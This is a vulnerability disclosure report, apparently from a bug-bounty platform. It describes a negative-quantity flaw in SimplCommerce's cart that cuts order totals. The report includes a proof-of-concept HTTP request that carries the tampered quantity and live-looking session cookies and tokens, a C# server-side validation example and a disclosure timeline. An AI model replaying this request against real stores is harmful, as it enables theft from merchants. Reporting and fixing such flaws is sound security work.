Business Logic Errors in simplcommerce/simplcommerce

Valid

Reported on

Oct 22nd 2021


Description

SimplCommerce accepts a negative product quantity, which allows one to get products for free.

The fix in https://github.com/simplcommerce/SimplCommerce/issues/971 does not work because client-side controls can be bypassed by modifying the POST request.

Proof of Concept

1: Add one $75 item and one $25 item to the cart.

2: Now go to the cart, intercept the request via a proxy, and modify the quantity of the $25 item to a negative number:

POST /cart/update-item-quantity HTTP/1.1
Host: [SimplCommerce-URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
X-XSRF-TOKEN: CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg
Request-Id: |pRtb5.391Gl
Request-Context: appId=cid-v1:de097dc4-1502-4412-8c78-7841be1a73ca
Content-Length: 35
Connection: close
Referer: https://demo.simplcommerce.com/cart
Cookie: SimplUserGuid=91f7b2d4-15a5-4a08-9ce4-00da2c66305d; .AspNetCore.Antiforgery.w5W7x28NAIs=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsTHywY5Br5pCQ57dMzUuRg4fxgXa6fm-N1Gor6FSNlsWweJZXbjubBzprCzSp6SLR337WOpPkz95xI-dVjwjpeMlj0-W9ku50l4dj-xbQpYSBRFbdcS82dwHgJMu2vWI; ARRAffinity=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ARRAffinitySameSite=16f852f05774947a25bec26c5259483bf2a73f782c2508294a7bdb89406aaf13; ai_user=znO4m|2021-10-22T16:02:08.334Z; _ga=GA1.2.1639028580.1634918529; _gid=GA1.2.7867952.1634918529; ai_session=0lWcm|1634918528717|1634920904054; idsrv.session=ALatLXJs34-rHNZUd8goxw; .AspNetCore.Identity.Application=CfDJ8BB4hZziqrxNrxPaeW2Vu_fsFlvej2SWbsdrnmONGDgt-z9lSvaXNUi-oynMXEMkEDbMRM5pISutqfBFaI6yDLLg3R0-WzdzWkRGO4edSHJmhFGlDVhZpb6VZDTNvxEHM2dLK2LjHJw5P0Rl6WgjToK2YJvAP8VCC69cu9HK_VhayGDxFgrq_5gMPtch7fQvOJRIm533JApctyh60HXs5V1nhoRH_1Yo9_H-ctQM7FAlv9TGVPQ6lxNVulwW8RONrqR5AgicpGp1W7R3mHfYfzmKc5bWLoJk9_1eKbhgVLuzrJZmjg4zHe1veAGnpiagldgpNRtj_7M4Wo0fD3EumNvMuUv9YcyFJr1g4rnxygVIwtN1zhYK2g8hTgPFuEY0SCgpK28LtMIcvDasGVik98XvzOqwd5OD5L8Y8gWCZM0zKI17oNnQGgtSPWODAjWaPhoQPU2pB-C7tNu-LHkyZ-i22_-ZQi2R5SEF-6dUaEGbn0tWrJom4Wu4TWqXEFIcvVODc_KT-tJO4ia1u3n3HozITs-JyXP6hKGGTPlU0gWxWwTeVeblnm_sx-hcEUUrcPwVv5R38AJDWG7yXGIRJv4n9bfcrF5wpFFRsUMLWUd5ERZOu4qOk3qPvT4fHXYqtRdu1fUn9a5c3GexBLWMWgXvPGOrNRGOJg8rrNt-RDWrQSpugXx1HRl-8_vvLvKb5-0mdbBa19eDTxqb8U9MXCBdmFh2t3tr0tXg7ME3JdXR614A1Z-gLtYkatmXwhGpDH3dQyyCKG4mem_cS1bqb23shyreH5wE-wbrF-ZJJmFp1bI-YHwJxY955fbRFF7EwEO-ia6tHNcq_-fVQQv97DyPhrQYN1uDYe4AXF5ss4TJPxbKgiiKoOFCnQJ8qObK0ivf5SemKy4sg60QPVdQq-g7SViZwn16CY0V5brn3Tclu4t03zlnNFHNwU61Qz2vzrY2nsgcwO3HXa9goJe4ChT7o0v4M_DOiagtSDsAp3KKPdY6zb1CAx-Vbm9TPLTrXYd49ZyiqXeo_2K2njmQvJ0z6X0DOwOTMuXQiOSi5WAG; XSRF-TOKEN=CfDJ8BB4hZziqrxNrxPaeW2Vu_d_G73QObcBjoS1Y4UgGGG_pngxa7YaWEwWGAvHiwgqgbWudlRQA4Kc9X9b0MhTafFmZaUbRe0kHMa5_Zzc55nczSuikHqGoaVTuyIwewcscrNnYxKkev6Ugx-xtlwEXW7SWVtDxpTAJnsKhe0ECCh5_28-AXDumjN_mDtoXIV3qg

{"cartItemId":372127,"quantity":-2}

3: See that our $75 product now costs $25!

See the following picture of a $75 product now costing $25: https://drive.google.com/file/d/1HIb1xp43IYTv7k9j8_S-BNQZa6DiWvrL/view?usp=sharing

Impact

This vulnerability is capable of...

Occurrences

Quantity should be checked if it's negative

Quantity should be checked if it's negative
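
The server-side check the report asks for, next to the unchecked update that lets a negative quantity subtract from the cart total. This is an added example, not SimplCommerce code and not the merged fix; all type and member names are hypothetical, the cart is constructed from the PoC values, and the upper bound of 1000 is an assumed business rule.

```csharp
using System;
using System.Collections.Generic;
using System.ComponentModel.DataAnnotations;
using System.Linq;

// Added example: every type and member name here is hypothetical, not SimplCommerce's.
public record CartLine(long Id, decimal UnitPrice, int Quantity);

// Body shape taken from the PoC request: {"cartItemId":...,"quantity":...}
public class UpdateQuantityRequest
{
    public long CartItemId { get; set; }
    [Range(1, 1000)] // enforced on the server; the 1000 ceiling is an assumed business rule
    public int Quantity { get; set; }
}

public static class CartDemo
{
    public static decimal Total(IEnumerable<CartLine> lines) =>
        lines.Sum(l => l.UnitPrice * l.Quantity);

    // "Before": applies whatever quantity the client sent.
    public static List<CartLine> UpdateUnchecked(List<CartLine> cart, UpdateQuantityRequest req) =>
        cart.Select(l => l.Id == req.CartItemId ? (l with { Quantity = req.Quantity }) : l).ToList();

    // "After": validates the request on the server before the cart changes.
    public static bool TryUpdate(List<CartLine> cart, UpdateQuantityRequest req, out List<CartLine> updated)
    {
        updated = cart;
        var errors = new List<ValidationResult>();
        var ctx = new ValidationContext(req);
        if (!Validator.TryValidateObject(req, ctx, errors, validateAllProperties: true))
            return false; // out-of-range quantity, cart left untouched
        if (!cart.Any(l => l.Id == req.CartItemId))
            return false; // unknown cart item
        updated = UpdateUnchecked(cart, req);
        return true;
    }

    public static void Main()
    {
        // Constructed cart matching the PoC: one $75 item and one $25 item.
        var cart = new List<CartLine> { new(1, 75m, 1), new(372127, 25m, 1) };
        var req = new UpdateQuantityRequest { CartItemId = 372127, Quantity = -2 };
        Console.WriteLine($"unchecked total: {Total(UpdateUnchecked(cart, req))}");
        bool ok = TryUpdate(cart, req, out var kept);
        Console.WriteLine($"validated: accepted={ok}, total: {Total(kept)}");
    }
}
```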

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a month ago)
We have contacted a member of the simplcommerce team and are waiting to hear back (a month ago)
We have sent a follow-up to the simplcommerce team. We will try again in 7 days. (a month ago)
simplcommerce/simplcommerce maintainer validated this vulnerability (a month ago)
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
simplcommerce/simplcommerce maintainer confirmed that a fix has been merged on 2bce25 (a month ago)
The fix bounty has been dropped
CartController.cs#L97L131 has been validated
CartController.cs#L46L80 has been validated